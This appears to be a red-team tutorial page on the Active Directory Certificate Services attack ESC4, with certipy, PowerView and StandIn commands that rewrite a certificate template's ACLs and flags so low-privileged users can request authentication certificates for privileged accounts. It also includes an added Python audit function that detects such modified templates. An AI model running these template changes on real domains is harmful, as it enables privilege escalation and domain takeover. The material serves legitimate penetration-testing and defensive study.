# ESC4

ESC4 lets an attacker introduce a misconfiguration into a certificate template that is not vulnerable to begin with by abusing overly permissive ACLs on the template object; the rights that matter for this abuse are:

* Owner - Full Control
* FullControl - Full Control
* WriteOwner - Modify the owner, which in turn grants Full Control
* WriteDacl - Modify the access control list, which in turn grants Full Control
* WriteProperty - Edit any property of the template

To make a template exploitable we need to change these values:

* Grant Enrollment rights for the vulnerable template
* Disable the `PEND_ALL_REQUESTS` flag in `mspki-enrollment-flag` to deactivate Manager Approval
* Set the `mspki-ra-signature` attribute to `0` to disable the `Authorized Signature requirement`
* Enable the `ENROLLEE_SUPPLIES_SUBJECT` flag in `mspki-certificate-name-flag` to allow the requesting user to specify a different (privileged) account name as the `SAN`
* Set the `mspki-certificate-application-policy` to a certificate purpose for authentication:
  * Client Authentication (OID: 1.3.6.1.5.5.7.3.2)
  * Smart Card Logon (OID: 1.3.6.1.4.1.311.20.2.2)
  * PKINIT Client Authentication (OID: 1.3.6.1.5.2.3.4)
  * Any Purpose (OID: 2.5.29.37.0)
  * No Extended Key Usage (EKU)

These are the steps we can take to abuse a certificate template vulnerable to ESC4. First we make the changes to the templates we have ACLs on and save the old configuration so that we can revert the changes later:

```
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -save-old
```

Now the `ESC4` template should be vulnerable to all techniques from ESC1 to ESC4 (inclusive):

```
certipy find -u otter -p 'SomethingSecure123!' -dc-ip 10.10.10.10 -vulnerable -stdout

<SNIP>

ESC1 : 'LAB.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2  : 'LAB.LOCAL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3  : 'LAB.LOCAL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4  : 'LAB.LOCAL\\Authenticated Users' has dangerous permissions
```

From this point on we can abuse any of the 3 misconfigurations (either [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1), [ESC2](https://otter.gitbook.io/red-teaming/notes/adcs/esc2) or [ESC3](https://otter.gitbook.io/red-teaming/notes/adcs/esc3)).

To revert the changes made to the certificate template we can use the JSON file generated by the previous `certipy template` command:

```
certipy template -u otter -p 'SomethingSecure123!' -template ESC4 -configuration ESC4.json
```

The `certipy template` command automates the whole process of setting up the misconfigurations, but it is also possible to do it manually from a Windows host with PowerView, using the following commands.

1. Add Certificate Enrollment Permissions to the `Domain Users` group

```
Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity "Domain Users" -RightsGUID "0e10c968-78fb-11d2-90d4-00c04f79dc55" -TargetSearchBase "LDAP://CN=Configuration,DC=domain,DC=com" -Verbose
```

2. Disable the [manager approval requirement](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/ec71fd43-61c2-407b-83c9-b52272dec8a1) by setting `mspki-enrollment-flag` to `0x00000009` (`0x00000001 + 0x00000008`, i.e. `CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS` and `CT_FLAG_PUBLISH_TO_DS`), which clears the `PEND_ALL_REQUESTS` bit

```
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-enrollment-flag'=9} -Verbose
```

3. Disable the Authorized Signature requirement by setting the `mspki-ra-signature` attribute to `0`

```
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-ra-signature'=0} -Verbose
```

4. Enable SAN specification, making the template vulnerable to [ESC1](https://otter.gitbook.io/red-teaming/notes/adcs/esc1), by setting the [ENROLLEE\_SUPPLIES\_SUBJECT](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/1192823c-d839-4bc3-9b6b-fa8c53507ae1) flag to `1`

```
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-name-flag'=1} -Verbose
```

5. Add the Client Authentication EKU to both `pkiextendedkeyusage` and `mspki-certificate-application-policy`

```
Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'pkiextendedkeyusage'='1.3.6.1.5.5.7.3.2'} -Verbose

Set-DomainObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=com" -Identity ESC4 -Set @{'mspki-certificate-application-policy'='1.3.6.1.5.5.7.3.2'} -Verbose
```
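As an added audit example (not code from certipy, PowerView or this page), the following Python function checks a template's attribute values against the conditions the five steps above introduce, so a defender can spot an ESC4-modified template from a dump of the `CN=Certificate Templates` objects. The `enrollees` field and the sample records are constructed assumptions; resolving the real enrollment ACL is left to the directory query.

```python
# Added audit helper, not code from certipy or PowerView: checks one certificate template
# record for the conditions the ESC4 procedure above introduces. Attribute names match the
# AD object; the "enrollees" list and the sample records are constructed, not read from AD.

# Flag bits from MS-CRTD (msPKI-Enrollment-Flag / msPKI-Certificate-Name-Flag)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # manager approval required
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester may set the SAN

AUTH_OIDS = {"1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.20.2.2",  # Client Auth, Smart Card Logon
             "1.3.6.1.5.2.3.4", "2.5.29.37.0"}               # PKINIT Client Auth, Any Purpose
ANY_PURPOSE = "2.5.29.37.0"
REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"   # Certificate Request Agent EKU (ESC3)
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def audit_template(t: dict) -> list[str]:
    """Return ESC1/2/3 findings for a template that low-privileged principals can enroll in."""
    enrollees = LOW_PRIV & set(t.get("enrollees", []))
    if not enrollees:
        return []   # only privileged principals can enroll: nothing the steps above would expose
    ekus = set(t.get("pkiextendedkeyusage", [])) | set(t.get("mspki-certificate-application-policy", []))
    manager_approval = bool(t.get("mspki-enrollment-flag", 0) & CT_FLAG_PEND_ALL_REQUESTS)
    supplies_subject = bool(t.get("mspki-certificate-name-flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    # Manager approval or a required RA signature blocks unattended enrollment
    if manager_approval or t.get("mspki-ra-signature", 0) > 0:
        return []
    who = ", ".join(sorted(enrollees))
    findings = []
    # No EKU at all behaves like Any Purpose: the certificate is valid for authentication
    if supplies_subject and (not ekus or ekus & AUTH_OIDS):
        findings.append(f"ESC1: {who} can enroll, enrollee supplies subject and template allows client authentication")
    if not ekus or ANY_PURPOSE in ekus:
        findings.append(f"ESC2: {who} can enroll and template can be used for any purpose")
    if REQUEST_AGENT in ekus:
        findings.append(f"ESC3: {who} can enroll and template has Certificate Request Agent EKU set")
    return findings


# Constructed records: the template before and after the five steps above
BEFORE = {"enrollees": ["Domain Admins"], "mspki-enrollment-flag": 0x0000000B,  # 0x0B keeps PEND_ALL_REQUESTS set
          "mspki-ra-signature": 1, "mspki-certificate-name-flag": 0,
          "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"]}                          # Server Authentication only
AFTER = {"enrollees": ["Domain Admins", "Domain Users"], "mspki-enrollment-flag": 0x00000009,
         "mspki-ra-signature": 0, "mspki-certificate-name-flag": 1,
         "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"],
         "mspki-certificate-application-policy": ["1.3.6.1.5.5.7.3.2"]}

if __name__ == "__main__":
    for name, rec in (("before", BEFORE), ("after", AFTER)):
        print(name, audit_template(rec) or ["no findings"])
```

Comparing the result for a live template against the same function run over the JSON saved with `-save-old` shows exactly which of the five changes turned a clean template into an ESC1/ESC2/ESC3 one.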

We can also do the same thing with `StandIn`; the following are the commands used to introduce an ESC1 misconfiguration into a certificate template.

* Add `ENROLLEE_SUPPLIES_SUBJECT`

```
.\StandIn.exe --ADCS --filter SecureUpdate --ess --add
```

* Add Certificate Enrollment Permissions to the `Domain Users` group

```
.\StandIn.exe --ADCS --filter SecureUpdate --ntaccount "DOMAIN\domain users" --enroll --add
```

* Add an EKU (in this case the Client Authentication EKU):

```
.\StandIn.exe --ADCS --filter SecureUpdate --clientauth --add
```
